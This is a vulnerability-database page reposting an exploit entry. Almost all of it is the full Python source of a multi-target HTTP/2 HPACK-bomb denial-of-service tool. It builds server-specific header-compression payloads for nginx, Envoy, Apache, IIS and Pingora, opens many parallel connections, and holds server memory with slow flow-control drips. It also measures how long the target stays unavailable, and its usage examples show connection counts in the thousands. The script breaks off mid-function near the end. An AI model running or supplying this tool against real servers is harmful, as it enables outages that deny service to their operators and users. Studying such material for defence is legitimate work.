Lucene search
K

📄 HTTP/2 Multi-Server HPACK Exhaustion

🗓️ 12 Jun 2026 00:00:00Reported by indoushkaType 
packetstorm
 packetstorm
🔗 packetstorm.news👁 12 Views

Multi-target HTTP/2 HPACK exhaustion framework to stress servers via amplification and flow-control.

Code
==================================================================================================================================
    | # Title     : HTTP/2 Multi-Server HPACK Exhaustion                                                                             |
    | # Author    : indoushka                                                                                                        |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                 |
    | # Vendor    : System built in component                                                                                        |
    ==================================================================================================================================
    
    [+] Summary    :  This code implements a multi-target HTTP/2 resource exhaustion framework designed to stress or overwhelm server implementations through protocol-level amplification techniques. 
                      It includes server-specific payload generation for multiple platforms, automated connection orchestration, stream scaling, and memory pressure strategies 
    				  using HPACK compression behavior and flow-control manipulation.
                     
    
    [+] POC        :  
    
    #!/usr/bin/env python3
    
    import argparse
    import socket
    import ssl
    import struct
    import sys
    import threading
    import time
    import urllib.request
    import json
    from typing import List, Tuple, Optional
    from dataclasses import dataclass
    from enum import Enum
    
    H2_PREFACE = b"PRI * HTTP/2.0\r\n\r\nSM\r\n\r\n"
    
    FRAME_DATA = 0x0
    FRAME_HEADERS = 0x1
    FRAME_SETTINGS = 0x4
    FRAME_PING = 0x6
    FRAME_GOAWAY = 0x7
    FRAME_WINDOW_UPDATE = 0x8
    FRAME_CONTINUATION = 0x9
    FLAG_END_STREAM = 0x1
    FLAG_END_HEADERS = 0x4
    FLAG_ACK = 0x1
    SETTINGS_HEADER_TABLE_SIZE = 0x1
    SETTINGS_ENABLE_PUSH = 0x2
    SETTINGS_MAX_CONCURRENT = 0x3
    SETTINGS_INITIAL_WINDOW_SIZE = 0x4
    SETTINGS_MAX_FRAME_SIZE = 0x5
    DEFAULT_WINDOW = 65535
    MAX_FRAME_SIZE = 16384
    
    class ServerType(Enum):
        NGINX = "nginx"
        ENVOY = "envoy"
        APACHE = "apache"
        IIS = "iis"
        PINGORA = "pingora"
        AUTO = "auto"
    
    
    @dataclass
    class ServerConfig:
        """Server-specific configuration"""
        name: str
        default_port: int
        needs_tls: bool
        max_headers: int
        max_streams: int
        amplification: int
        special_payload: Optional[str] = None
        cookie_size: Optional[int] = None
    
    
    SERVER_CONFIGS = {
        ServerType.NGINX: ServerConfig(
            name="nginx",
            default_port=443,
            needs_tls=True,
            max_headers=32000,
            max_streams=128,
            amplification=70
        ),
        ServerType.ENVOY: ServerConfig(
            name="Envoy",
            default_port=10000,
            needs_tls=True,
            max_headers=8192,
            max_streams=100,
            amplification=5700,
            cookie_size=4058
        ),
        ServerType.APACHE: ServerConfig(
            name="Apache httpd",
            default_port=8443,
            needs_tls=True,
            max_headers=4091,
            max_streams=100,
            amplification=4000
        ),
        ServerType.IIS: ServerConfig(
            name="Microsoft IIS",
            default_port=443,
            needs_tls=True,
            max_headers=900,
            max_streams=100,
            amplification=68
        ),
        ServerType.PINGORA: ServerConfig(
            name="Cloudflare Pingora",
            default_port=6145,
            needs_tls=False,
            max_headers=32000,
            max_streams=100000,
            amplification=33
        ),
    }
    
    def hpack_int(value: int, prefix_bits: int, first_byte_prefix: int) -> bytes:
        """Encode integer as HPACK integer"""
        max_prefix = (1 << prefix_bits) - 1
        if value < max_prefix:
            return bytes([first_byte_prefix | value])
        
        out = bytearray([first_byte_prefix | max_prefix])
        value -= max_prefix
        while value >= 128:
            out.append((value & 0x7F) | 0x80)
            value >>= 7
        out.append(value)
        return bytes(out)
    
    def hpack_string(data: bytes) -> bytes:
        """Encode string as HPACK string literal"""
        return hpack_int(len(data), 7, 0x00) + data
    
    def indexed(index: int) -> bytes:
        """Indexed header field representation"""
        return hpack_int(index, 7, 0x80)
    
    def literal_indexed_name_with_indexing(name_index: int, value: bytes) -> bytes:
        """Literal header field with indexing - indexed name"""
        return hpack_int(name_index, 6, 0x40) + hpack_string(value)
    
    def literal_indexed_name_without_indexing(name_index: int, value: bytes) -> bytes:
        """Literal header field without indexing - indexed name"""
        return hpack_int(name_index, 4, 0x00) + hpack_string(value)
    
    def build_nginx_hpack_bomb(num_headers: int) -> bytes:
        """
        Build HPACK bomb for nginx
        Strategy: Insert ("a", "") then reference it many times
        """
        block = bytearray()
        block.append(0x80 | 2)   
        block.append(0x80 | 4)   
        block.append(0x80 | 6)   
        block.append(0x41)      
        block.append(0x01)       
        block.append(ord("x"))  
        block.append(0x40)     
        block.append(0x01)      
        block.append(ord("a"))   
        block.append(0x00)       
        refs = max(0, num_headers - 5)
        block.extend(b"\xbe" * refs)
        
        return bytes(block)
    
    
    def build_envoy_hpack_bomb(num_headers: int, cookie_value_size: int = 4058) -> bytes:
        """
        Build HPACK bomb for Envoy using cookie coalescing
        """
        cookie_value = b"x" * min(cookie_value_size, 4058)
        block = bytearray()
        
        block += indexed(2)    
        block += indexed(7)     
        block += indexed(4)     
        block += literal_indexed_name_without_indexing(1, b"localhost")
        block += literal_indexed_name_with_indexing(32, cookie_value)
        refs = max(0, num_headers - 5)
        block += indexed(62) * refs
        
        return bytes(block)
    
    
    def build_apache_hpack_bomb(num_headers: int) -> bytes:
        """
        Build HPACK bomb for Apache httpd
        Uses empty cookie values for maximum amplification
        """
        block = bytearray()
        block += indexed(2)    
        block += indexed(7)     
        block += literal_indexed_name_without_indexing(4, b"/missing")
        block += literal_indexed_name_without_indexing(1, b"localhost")
        block += literal_indexed_name_with_indexing(32, b"")
        refs = max(0, num_headers - 4)
        block += indexed(62) * refs
        
        return bytes(block)
    
    
    def build_iis_hpack_bomb(num_headers: int) -> bytes:
        """
        Build HPACK bomb for IIS
        Uses ':scheme https' at index 7 (not 6)
        """
        block = bytearray()
        
        block.append(0x80 | 2) 
        block.append(0x80 | 4)  
        block.append(0x80 | 7)  
        block.append(0x41)      
        block.append(0x09)      
        block.extend(b"localhost")
        block.append(0x40)    
        block.append(0x01)   
        block.append(ord("a"))  
        block.append(0x00)     
        
        refs = max(0, num_headers - 5)
        block.extend(b"\xbe" * refs)
        
        return bytes(block)
    
    
    def build_pingora_hpack_bomb(num_headers: int) -> bytes:
        """
        Build HPACK bomb for Pingora (h2c - clear text)
        """
        block = bytearray()
        
        block.append(0x82)       
        block.append(0x84)       
        block.append(0x86)    
        block.append(0x41)      
        block.append(0x01)
        block.append(ord("x"))
        block.append(0x40)    
        block.append(0x01)
        block.append(ord("a"))
        block.append(0x00)
        
        refs = max(0, num_headers - 5)
        block.extend(b"\xbe" * refs)
        
        return bytes(block)
    
    def frame(ftype: int, flags: int, stream_id: int, payload: bytes) -> bytes:
        """Build HTTP/2 frame"""
        length = len(payload)
        hdr = struct.pack("!I", length)[1:]  # 3-byte length
        hdr += struct.pack("!BB", ftype, flags)
        hdr += struct.pack("!I", stream_id & 0x7FFFFFFF)
        return hdr + payload
    
    
    def settings_frame(params: List[Tuple[int, int]], ack: bool = False) -> bytes:
        """Build SETTINGS frame"""
        if ack:
            return frame(FRAME_SETTINGS, FLAG_ACK, 0, b"")
        payload = b"".join(struct.pack("!HI", pid, val) for pid, val in params)
        return frame(FRAME_SETTINGS, 0, 0, payload)
    
    
    def window_update_frame(stream_id: int, increment: int) -> bytes:
        """Build WINDOW_UPDATE frame"""
        return frame(FRAME_WINDOW_UPDATE, 0, stream_id, struct.pack("!I", increment))
    
    
    def ping_ack_frame(opaque_data: bytes) -> bytes:
        """Build PING ACK frame"""
        return frame(FRAME_PING, FLAG_ACK, 0, opaque_data)
    
    
    def split_into_frames(stream_id: int, header_block: bytes, max_payload: int = MAX_FRAME_SIZE) -> List[bytes]:
        """Split HPACK block into HEADERS + CONTINUATION frames"""
        frames = []
        offset = 0
        first = True
        
        while offset < len(header_block):
            chunk = header_block[offset:offset + max_payload]
            offset += len(chunk)
            is_last = offset >= len(header_block)
            
            if first:
                flags = FLAG_END_STREAM
                if is_last:
                    flags |= FLAG_END_HEADERS
                frames.append(frame(FRAME_HEADERS, flags, stream_id, chunk))
                first = False
            else:
                flags = FLAG_END_HEADERS if is_last else 0
                frames.append(frame(FRAME_CONTINUATION, flags, stream_id, chunk))
        
        return frames
    
    
    def parse_frames(data: bytes):
        """Parse raw HTTP/2 frames"""
        offset = 0
        while offset + 9 <= len(data):
            length = (data[offset] << 16) | (data[offset+1] << 8) | data[offset+2]
            ftype = data[offset+3]
            flags = data[offset+4]
            stream_id = struct.unpack("!I", data[offset+5:offset+9])[0] & 0x7FFFFFFF
            
            if offset + 9 + length > len(data):
                break
            
            payload = data[offset+9:offset+9+length]
            yield ftype, flags, stream_id, payload
            offset += 9 + length
    class H2Connection:
        def __init__(self, host: str, port: int, server_type: ServerType, 
                     conn_id: int = 0, verbose: bool = False):
            self.host = host
            self.port = port
            self.server_type = server_type
            self.conn_id = conn_id
            self.verbose = verbose
            self.sock = None
            self.stream_ids = []
            self.active = False
            self.config = SERVER_CONFIGS.get(server_type)
        
        def log(self, msg: str):
            if self.verbose:
                print(f"  [conn-{self.conn_id}] {msg}")
        
        def connect(self):
            """Establish TLS (or plain) HTTP/2 connection"""
            if self.config.needs_tls:
                ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
                ctx.check_hostname = False
                ctx.verify_mode = ssl.CERT_NONE
                ctx.set_alpn_protocols(["h2"])
                
                raw = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                raw.settimeout(30)
                raw.connect((self.host, self.port))
                
                self.sock = ctx.wrap_socket(raw, server_hostname=self.host)
                negotiated = self.sock.selected_alpn_protocol()
                if negotiated != "h2":
                    raise RuntimeError(f"ALPN negotiated '{negotiated}', expected 'h2'")
            else:
                self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                self.sock.settimeout(30)
                self.sock.connect((self.host, self.port))
            
            self.log(f"Connected to {self.host}:{self.port}")
        
        def handshake(self, initial_window: int = 0):
            """Send HTTP/2 preface and SETTINGS"""
            self.sock.sendall(H2_PREFACE)
            self.sock.sendall(settings_frame([
                (SETTINGS_ENABLE_PUSH, 0),
                (SETTINGS_INITIAL_WINDOW_SIZE, initial_window),
            ]))
    
            self._drain(timeout=2.0)
            self.sock.sendall(settings_frame([], ack=True))
            
            self.log("Handshake complete")
            self.active = True
        
        def build_payload(self, num_headers: int) -> bytes:
            """Build server-specific HPACK bomb"""
            if self.server_type == ServerType.NGINX:
                return build_nginx_hpack_bomb(num_headers)
            elif self.server_type == ServerType.ENVOY:
                cookie_size = self.config.cookie_size or 4058
                return build_envoy_hpack_bomb(num_headers, cookie_size)
            elif self.server_type == ServerType.APACHE:
                return build_apache_hpack_bomb(num_headers)
            elif self.server_type == ServerType.IIS:
                return build_iis_hpack_bomb(num_headers)
            elif self.server_type == ServerType.PINGORA:
                return build_pingora_hpack_bomb(num_headers)
            else:
                return build_nginx_hpack_bomb(num_headers)
        
        def send_bombs(self, num_streams: int, num_headers: int) -> int:
            """Send HPACK bomb streams"""
            hpack_block = self.build_payload(num_headers)
            wire_per_stream = len(hpack_block)
            
            self.log(f"Sending {num_streams} streams, {wire_per_stream} bytes/stream")
            
            total_wire = 0
            for i in range(num_streams):
                stream_id = 2 * i + 1
                self.stream_ids.append(stream_id)
                
                frames = split_into_frames(stream_id, hpack_block)
                for f in frames:
                    self.sock.sendall(f)
                    total_wire += len(f)
            
            self.log(f"Sent {total_wire:,} bytes ({total_wire/1024:.1f} KB)")
            self._drain(timeout=1.0)
            self.active = True
            
            return total_wire
        
        def hold_with_drip(self, hold_seconds: int, drip_interval: int = 50):
            """Hold memory with periodic WINDOW_UPDATEs"""
            self.log(f"Holding for {hold_seconds}s (drip every {drip_interval}s)")
            
            t0 = time.monotonic()
            drip_count = 0
            
            while time.monotonic() - t0 < hold_seconds and self.active:
                wait_until = time.monotonic() + drip_interval
                while time.monotonic() < wait_until and self.active:
                    remaining = wait_until - time.monotonic()
                    self._drain(timeout=min(remaining, 5.0))
                
                if not self.active:
                    break
                
                try:
                    self.sock.sendall(window_update_frame(0, 1))
                    for sid in self.stream_ids:
                        self.sock.sendall(window_update_frame(sid, 1))
                    drip_count += 1
                except (BrokenPipeError, ConnectionResetError, OSError):
                    self.log("Connection lost during drip")
                    self.active = False
                    break
            
            elapsed = time.monotonic() - t0
            self.log(f"Hold ended: {elapsed:.0f}s, {drip_count} drips")
        
        def _drain(self, timeout: float = 1.0):
            """Read incoming frames and respond to PINGs"""
            self.sock.settimeout(timeout)
            try:
                while True:
                    data = self.sock.recv(65536)
                    if not data:
                        self.active = False
                        return
                    
                    for ftype, flags, sid, payload in parse_frames(data):
                        if ftype == FRAME_PING and not (flags & FLAG_ACK):
                            self.sock.sendall(ping_ack_frame(payload))
                        elif ftype == FRAME_GOAWAY:
                            error = struct.unpack("!I", payload[4:8])[0] if len(payload) >= 8 else 0
                            self.log(f"GOAWAY received, error={error}")
                            self.active = False
                            return
            except (socket.timeout, ssl.SSLWantReadError, BlockingIOError):
                pass
            except (ConnectionResetError, BrokenPipeError, OSError):
                self.active = False
        
        def close(self):
            if self.sock:
                try:
                    self.sock.close()
                except OSError:
                    pass
    def launch_iis_attack(target: str, port: int, num_procs: int, 
                          conns_per_proc: int, hold: int) -> None:
        """
        Launch multiple parallel processes for IIS attack
        IIS requires 10,000-50,000 connections to exhaust memory
        """
        import subprocess
        import os
        
        script_path = os.path.abspath(__file__)
        procs = []
        
        print(f"[*] Launching {num_procs} parallel processes for IIS attack")
        print(f"    Total connections: {num_procs * conns_per_proc}")
        
        for i in range(num_procs):
            cmd = [
                sys.executable, script_path,
                "--target", target,
                "--port", str(port),
                "--server", "iis",
                "--connections", str(conns_per_proc),
                "--streams", "100",
                "--headers", "900",
                "--hold", str(hold),
                "--no-probe"
            ]
            
            proc = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
            procs.append(proc)
            time.sleep(0.5)
        
        print(f"[*] All {num_procs} processes launched. Waiting for completion...")
        
        for i, proc in enumerate(procs):
            stdout, stderr = proc.communicate()
            if proc.returncode != 0:
                print(f"    Process {i} failed: {stderr.decode()[:200]}")
        
        print("[*] Attack completed")
    def monitor_rss(container_name: Optional[str] = None, pid: Optional[int] = None):
        """Monitor memory usage of target process"""
        import subprocess
        
        if container_name:
            try:
                result = subprocess.run(
                    ["docker", "inspect", "--format", "{{.State.Pid}}", container_name],
                    capture_output=True, text=True
                )
                pid = int(result.stdout.strip())
            except Exception as e:
                print(f"Failed to get container PID: {e}")
                return
        
        if not pid:
            print("No PID specified")
            return
        
        print(f"Monitoring PID {pid}")
        peak = 0
        t0 = time.monotonic()
        
        try:
            while True:
                with open(f"/proc/{pid}/status") as f:
                    for line in f:
                        if line.startswith("VmRSS:"):
                            rss_kb = int(line.split()[1])
                            rss_mb = rss_kb / 1024
                            peak = max(peak, rss_mb)
                            elapsed = time.monotonic() - t0
                            print(f"[{elapsed:6.1f}s] RSS: {rss_mb:8.1f} MB (peak: {peak:.1f} MB)")
                            break
                time.sleep(0.5)
        except KeyboardInterrupt:
            print(f"\nPeak RSS: {peak:.1f} MB")
        except FileNotFoundError:
            print(f"Process {pid} terminated")
    def probe_accessibility(host: str, port: int, results: list, stop_event: threading.Event, interval: int = 5):
        """Probe target availability during attack"""
        url = f"https://{host}:{port}/" if port == 443 else f"http://{host}:{port}/"
        ctx = ssl.create_default_context()
        ctx.check_hostname = False
        ctx.verify_mode = ssl.CERT_NONE
        
        t0 = time.monotonic()
        
        while not stop_event.is_set():
            elapsed = time.monotonic() - t0
            try:
                req = urllib.request.Request(url)
                start = time.monotonic()
                resp = urllib.request.urlopen(req, timeout=5, context=ctx)
                latency = (time.monotonic() - start) * 1000
                results.append((elapsed, resp.status, latency))
            except Exception:
                results.append((elapsed, 0, 5000))
            
            stop_event.wait(interval)
    def run_attack(args):
        """Execute full attack"""
        server_type = ServerType(args.server)
        config = SERVER_CONFIGS[server_type]
        
        print(f"""
    {'=' * 70}
      HTTP/2 Bomb Attack
      Target:      {args.target}:{args.port} ({config.name})
      Server:      {server_type.value}
      Connections: {args.connections}
      Streams:     {args.streams} per connection
      Headers:     {args.headers:,} per stream
      Hold:        {args.hold}s (drip every {args.drip}s)
      TLS:         {'Yes' if config.needs_tls else 'No'}
    {'=' * 70}
    """)
    
        mem_per_stream = args.headers * 59 * 1.17 if server_type != ServerType.PINGORA else args.headers * 33
        mem_per_conn = args.streams * mem_per_stream / 1024 / 1024
        mem_total = args.connections * mem_per_conn
        wire_total = args.connections * args.streams * args.headers / 1024 / 1024
        amplification = mem_total / max(wire_total, 0.001)
        
        print(f"  Estimated server memory:")
        print(f"    Per stream:     {mem_per_stream/1024/1024:.2f} MB")
        print(f"    Per connection: {mem_per_conn:.1f} MB")
        print(f"    Total:          {mem_total:.0f} MB ({mem_total/1024:.1f} GB)")
        print(f"    Wire upload:    {wire_total:.1f} MB")
        print(f"    Amplification:  {amplification:.0f}:1")
        print()
    
        probe_results = []
        probe_stop = threading.Event()
        if not args.no_probe:
            probe_thread = threading.Thread(
                target=probe_accessibility,
                args=(args.target, args.port, probe_results, probe_stop, 5),
                daemon=True
            )
            probe_thread.start()
            time.sleep(1)
        print(f"[*] Phase 1: Establishing {args.connections} connections...")
        connections = []
        lock = threading.Lock()
        t_start = time.monotonic()
        
        def connect_worker(i):
            conn = H2Connection(args.target, args.port, server_type, i, args.verbose)
            try:
                conn.connect()
                conn.handshake(initial_window=args.initial_window)
                with lock:
                    connections.append(conn)
            except Exception as e:
                print(f"    Connection {i}: FAILED - {e}")
                conn.close()
        
        threads = []
        for i in range(args.connections):
            t = threading.Thread(target=connect_worker, args=(i,), daemon=True)
            t.start()
            threads.append(t)
            time.sleep(0.05)
        
        for t in threads:
            t.join(timeout=30)
        
        elapsed = time.monotonic() - t_start
        print(f"    {len(connections)}/{args.connections} established in {elapsed:.1f}s")
        
        if not connections:
            print("[!] No connections established")
            return
        print(f"[*] Phase 2: Sending HPACK bombs...")
        total_wire = 0
        t_bomb = time.monotonic()
        
        def bomb_worker(conn):
            nonlocal total_wire
            try:
                wire = conn.send_bombs(args.streams, args.headers)
                with lock:
                    total_wire += wire
            except Exception as e:
                print(f"    Connection {conn.conn_id}: SEND FAILED - {e}")
                conn.active = False
        
        threads = []
        for conn in connections:
            t = threading.Thread(target=bomb_worker, args=(conn,), daemon=True)
            t.start()
            threads.append(t)
        
        for t in threads:
            t.join(timeout=60)
        
        elapsed = time.monotonic() - t_bomb
        print(f"    Sent {total_wire/1024/1024:.1f} MB in {elapsed:.1f}s ({total_wire/1024/1024/elapsed:.1f} MB/s)")
    
        if args.hold > 0:
            print(f"[*] Phase 3: Holding for {args.hold}s (drip every {args.drip}s)")
            print("    Press Ctrl+C to stop early")
            
            threads = []
            for conn in connections:
                t = threading.Thread(
                    target=conn.hold_with_drip,
                    args=(args.hold, args.drip),
                    daemon=True
                )
                t.start()
                threads.append(t)
            
            try:
                for t in threads:
                    t.join()
            except KeyboardInterrupt:
                print("\n[*] Interrupted by user")
        probe_stop.set()
        active = sum(1 for c in connections if c.active)
        
        print(f"""
    {'=' * 70}
      RESULTS
    {'=' * 70}
      Total time:     {time.monotonic() - t_start:.0f}s
      Connections:    {active}/{len(connections)} active
      Wire uploaded:  {total_wire/1024/1024:.1f} MB
      Streams total:  {len(connections) * args.streams:,}
    """)
        
        if probe_results:
            accessible = sum(1 for _, status, _ in probe_results if status == 200)
            print(f"  Accessibility probe:")
            print(f"    Accessible: {accessible}/{len(probe_results)}")
            
            first_deny = next((t for t, s, _ in probe_results if s != 200), None)
            if first_deny:
                last_deny = max((t for t, s, _ in probe_results if s != 200), default=0)
                print(f"    Denial window: {first_deny:.0f}s - {last_deny:.0f}s (~{last_deny - first_deny:.0f}s)")
        
        for conn in connections:
            conn.close()
        
        print("\n[+] Attack completed!")
    def detect_server(host: str, port: int) -> Optional[ServerType]:
        """Attempt to identify server type by response headers"""
        import urllib.request
        
        print("[*] Attempting to auto-detect server type...")
        
        for server_type, config in SERVER_CONFIGS.items():
            if config.default_port != port and server_type != ServerType.AUTO:
                continue
            
            try:
                url = f"https://{host}:{port}/" if config.needs_tls else f"http://{host}:{port}/"
                ctx = ssl.create_default_context()
                ctx.check_hostname = False
                ctx.verify_mode = ssl.CERT_NONE
                
                req = urllib.request.Request(url, method="HEAD")
                resp = urllib.request.urlopen(req, timeout=5, context=ctx)
                
                server_header = resp.headers.get("Server", "")
                
                if "nginx" in server_header.lower():
                    return ServerType.NGINX
                elif "envoy" in server_header.lower():
                    return ServerType.ENVOY
                elif "apache" in server_header.lower():
                    return ServerType.APACHE
                elif "iis" in server_header.lower():
                    return ServerType.IIS
            except Exception:
                continue
        
        print("[!] Could not auto-detect, defaulting to nginx")
        return ServerType.NGINX
    def main():
        parser = argparse.ArgumentParser(
            description="HTTP/2 Bomb - Unified DoS Exploit for nginx, Envoy, Apache, IIS, Pingora",
            formatter_class=argparse.RawDescriptionHelpFormatter,
            epilog="""
    Examples:
      %(prog)s --target 192.168.1.100 --connections 15 --hold 120
      %(prog)s --target 192.168.1.100 --port 10000 --server envoy --connections 1 --streams 1
      %(prog)s --target 192.168.1.100 --port 8443 --server apache --connections 1 --streams 25
      %(prog)s --target 192.168.1.100 --server iis --connections 2000 --hold 300
      %(prog)s --target 192.168.1.100 --port 6145 --server pingora --connections 1 --streams 2048
      %(prog)s --target 192.168.1.100 --server iis --iis-procs 50 --iis-conns 1000
      %(prog)s --monitor-container nginx-h2-bomb
    """)
    
        parser.add_argument("--target", "-t", help="Target host/IP")
        parser.add_argument("--port", "-p", type=int, help="Target port (defaults per server)")
        parser.add_argument("--server", "-s", choices=["nginx", "envoy", "apache", "iis", "pingora", "auto"],
                           default="auto", help="Server type (default: auto-detect)")
        parser.add_argument("--connections", "-n", type=int, default=1, help="Number of connections")
        parser.add_argument("--streams", type=int, default=128, help="Streams per connection")
        parser.add_argument("--headers", type=int, default=32000, help="Headers per stream")
        parser.add_argument("--hold", type=int, default=120, help="Hold time in seconds")
        parser.add_argument("--drip", type=int, default=50, help="Drip interval in seconds")
        parser.add_argument("--initial-window", type=int, default=0, help="INITIAL_WINDOW_SIZE")
        parser.add_argument("--iis-procs", type=int, help="Number of parallel processes for IIS")
        parser.add_argument("--iis-conns", type=int, default=2000, help="Connections per IIS process")
        parser.add_argument("--monitor-container", help="Monitor container memory usage")
        parser.add_argument("--monitor-pid", type=int, help="Monitor process by PID")
        parser.add_argument("--no-probe", action="store_true", help="Disable accessibility probe")
        parser.add_argument("--detect", action="store_true", help="Auto-detect server type only")
        parser.add_argument("-v", "--verbose", action="store_true", help="Verbose output")
        
        args = parser.parse_args()
    
        if args.monitor_container:
            monitor_rss(container_name=args.monitor_container)
            return
        
        if args.monitor_pid:
            monitor_rss(pid=args.monitor_pid)
            return
        if args.detect:
            if not args.target:
                print("Error: --target required for detection")
                return
            port = args.port or 443
            server = detect_server(args.target, port)
            print(f"Detected server: {server.value}")
            return
        if not args.target:
            parser.print_help()
            print("\nError: --target required for attack")
            return
        if args.iis_procs:
            port = args.port or 443
            launch_iis_attack(args.target, port, args.iis_procs, args.iis_conns, args.hold)
            return
        if args.server == "auto":
    
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation